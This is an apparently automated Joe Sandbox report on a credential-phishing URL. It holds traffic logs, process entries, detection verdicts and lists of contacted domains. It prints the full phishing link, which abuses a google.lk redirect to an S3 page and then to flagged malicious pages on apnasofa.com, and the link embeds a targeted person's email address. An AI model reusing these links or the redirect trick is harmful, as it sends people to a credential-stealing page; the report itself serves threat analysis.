Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: google.lk
Source: global trafficDNS traffic detected: DNS query: www.google.lk
Source: global trafficDNS traffic detected: DNS query: i--iy.s3.us-east-1.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: apnasofa.com
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: ipwhois.app
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 29 Nov 2024 14:58:37 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
Source: chromecache_52.2.drString found in binary or memory: https://apnasofa.com/episode/index#
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 2.19.202.23:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.19.202.23:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49813 version: TLS 1.2
Source: classification engineClassification label: mal72.phis.win@18/20@20/10
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2364,i,9223651156863003473,13971906786475264581,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ=="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2364,i,9223651156863003473,13971906786475264581,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions		1
Process Injection		2
Masquerading		OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==0%Avira URL Cloudsafe
https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==100%SlashNextCredential Stealing type: Phishing & Social Engineering

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://apnasofa.com/favicon.ico100%Avira URL Cloudmalware
https://apnasofa.com/episode/image/logo.png100%Avira URL Cloudmalware
https://apnasofa.com/episode/style.css100%Avira URL Cloudmalware
https://apnasofa.com/episode/index100%Avira URL Cloudmalware
https://apnasofa.com/episode/script.js100%Avira URL Cloudmalware
https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.html0%Avira URL Cloudsafe
https://apnasofa.com/episode/index#100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ipwhois.app
103.126.138.87
truefalse
    		high
    www.google.lk
    		172.217.19.227
    		truefalse
      		high
      google.lk
      		142.250.181.67
      		truefalse
        		high
        www.google.com
        		172.217.21.36
        		truefalse
          		high
          api.ipify.org
          		104.26.12.205
          		truefalse
            		high
            apnasofa.com
            		103.160.107.138
            		truefalse
              		high
              s3-r-w.us-east-1.amazonaws.com
              		52.217.132.146
              		truefalse
                		high
                i--iy.s3.us-east-1.amazonaws.com
                		unknown
                		unknownfalse
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://www.google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com=&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.htmlfalse
                    		high
                    https://apnasofa.com/favicon.icofalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://apnasofa.com/episode/index#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==true
                      		unknown
                      https://apnasofa.com/episode/script.jsfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://i--iy.s3.us-east-1.amazonaws.com/vocabulary.htmlfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://ipwhois.app/json/8.46.123.228false
                        		high
                        https://apnasofa.com/episode/image/logo.pngfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://apnasofa.com/episode/style.cssfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://api.ipify.org/?format=jsonfalse
                          		high
                          https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.htmlfalse
                            		high
                            https://www.google.lk/amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.htmlfalse
                              		high
                              https://apnasofa.com/episode/indexfalse
                              • Avira URL Cloud: malware
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://apnasofa.com/episode/index#chromecache_52.2.drfalse
                              • Avira URL Cloud: malware
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              172.217.19.227
                              		www.google.lkUnited States
                              		15169GOOGLEUSfalse
                              104.26.12.205
                              		api.ipify.orgUnited States
                              		13335CLOUDFLARENETUSfalse
                              103.160.107.138
                              		apnasofa.comunknown
                              		7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                              52.217.132.146
                              		s3-r-w.us-east-1.amazonaws.comUnited States
                              		16509AMAZON-02USfalse
                              239.255.255.250
                              		unknownReserved
                              		unknownunknownfalse
                              172.217.21.36
                              		www.google.comUnited States
                              		15169GOOGLEUSfalse
                              142.250.181.67
                              		google.lkUnited States
                              		15169GOOGLEUSfalse
                              104.26.13.205
                              		unknownUnited States
                              		13335CLOUDFLARENETUSfalse
                              103.126.138.87
                              		ipwhois.appUnited States
                              		40676AS40676USfalse

                              Private

                              IP
                              192.168.2.4

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1565317
                              Start date and time:2024-11-29 15:57:15 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 7s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:browseurl.jbs
                              Sample URL:https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal72.phis.win@18/20@20/10
                              EGA Information:Failed
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded IPs from analysis (whitelisted): 216.58.208.227, 74.125.205.84, 172.217.17.46, 34.104.35.123, 2.20.68.201, 192.229.221.95, 199.232.214.172, 172.217.17.42, 172.217.17.74, 172.217.19.10, 172.217.19.234, 142.250.181.138, 172.217.19.170, 142.250.181.106, 142.250.181.10, 142.250.181.42, 142.250.181.74, 172.217.21.42, 172.217.19.202, 172.217.17.78, 172.217.17.35
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: https://google.lk/url?q=ernie.grue@nationalmi.com&nationalmi.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#ZXJuaWUuZ3J1ZUBuYXRpb25hbG1pLmNvbQ==

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              No context

                              Domains

                              No context

                              ASNs

                              No context

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              Chrome Cache Entry: 46

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
